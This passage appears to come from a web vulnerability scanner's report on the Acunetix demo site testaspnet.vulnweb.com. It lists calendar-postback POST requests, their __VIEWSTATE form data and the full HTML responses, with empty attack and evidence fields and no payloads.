vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:White" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8131&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAsWRgF9oIZGRkorKzqq4z40e3iIGpZwyRRLgItT0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKH5%2BHnDQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDFAWpxKlISdBx4eGseGyivlIHFpk
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:57 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAsWRgF9oIZGRkorKzqq4z40e3iIGpZwyRRLgItT0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKH5+HnDQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDFAWpxKlISdBx4eGseGyivlIHFpk" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:White" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8135&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAWA6FGtoIZGRkZy6%2BnophN7sF9jC4C4kgtlrpiZQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK6lv%2BoBQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHC%2FkY8KGrJ4ay%2B7J4yvXJkL1F57
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:36 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCAWA6FGtoIZGRkZy6+nophN7sF9jC4C4kgtlrpiZQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK6lv+oBQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHC/kY8KGrJ4ay+7J4yvXJkL1F57" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A 